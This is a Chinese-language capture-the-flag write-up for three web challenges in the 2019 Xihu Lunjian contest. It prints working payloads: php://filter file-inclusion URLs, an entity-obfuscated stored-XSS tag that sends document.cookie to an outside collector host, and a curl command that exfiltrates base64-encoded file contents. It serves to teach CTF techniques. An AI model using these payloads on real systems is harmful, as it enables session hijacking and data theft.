西湖论剑 2019 writeup

  ctf

0x00前言

清明节的时候迎来了西湖论剑的比赛,正好为国赛做做准备

 

0x01猜猜flag是什么

打开页面是一个皇家赌场的页面

使用dirsearch扫一波目录,发现了.DS_Store文件,为DS文件泄露,于是使用DS工具下载源码,发现一堆目录

一个一个检查,没有发现什么问题,于是将上面的md5码放入URL中得到页面

图中说到藏了东西,那么在这个目录下继续使用dirsearch扫面,扫出了git文件泄露,于是使用工具进行恢复,得到一个zip压缩包和其他源码

在zip包中发现了hint文件,但是解压缩要密码,于是各种爆破密码无果之后,在网上查阅资料发现了zip明文攻击,简单地说就是将里面已知文件与未压缩文件的未知文件进行对比,爆破加密。这里需要将index.php和图片进行压缩(这里需要用快压,使用原装的zip解不开。。。)使用AZPR软件进行明文爆破,虽然没有密码但是能够解开

解压之后的文件内容为一串md5和flag的位置

文中给出了code,结合开始的index页面,将code以GET参数放入url中得到一串code

 

同时,hint中还给出了seed.txt,于是猜测是php伪随机数问题,需要求出种子,使用php_mt_seed进行爆破,得到

放入url中的得到flag

flag{0730b6193000e9334b12cf7c95fbc736}

 

0x02babyt3

打开网站,首先映入眼帘的就有两个,一个hint和一个页面顶端的include $_GET['file'],猜测是文件包含漏洞

于是结合hint的payload打一波

ctf2.linkedbyx.com:10910/?file=php://filter/read=convert.base64-encode/resource=dir.php

用dir.php传dir参数读取文件

看到了flag的位置,文件包含直接读flag

http://ctf2.linkedbyx.com:10910/index.php?file=php://filter/read=convert.base64-encode/resource=/ffffflag_1s_Her4

0x03Breakout

开始网页需要登陆,直接输入用户名即可登陆,登录之后有三个选项,消息,报BUG和exec执行命令,但exec需要管理员权限才能够执行,在report.php上面有一段话

如果你发现了该站点的bug,请将页面的URL提交给管理员,管理员会加上用户的token去登陆查验。

感谢您的配合、

猜测应该就是在message上面的储存性XSS注入,测试之后发现javascript那里只需要回车既可以注入XSS

遂用payload写入

<img src="&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:windows.location.href='http://vps.ceye.io?cc='+document.cookie" 

然后去report页面提交留言板地址:http://ctf1.linkedbyx.com:10441/main.php,验证码使用脚本爆破即可

拿到cookie之后执行命令打回flag

curl vps/?$(cat /flag.txt|base64)

解密后得到flag

flag{fa51320ae808c70485dd5f30337026d6}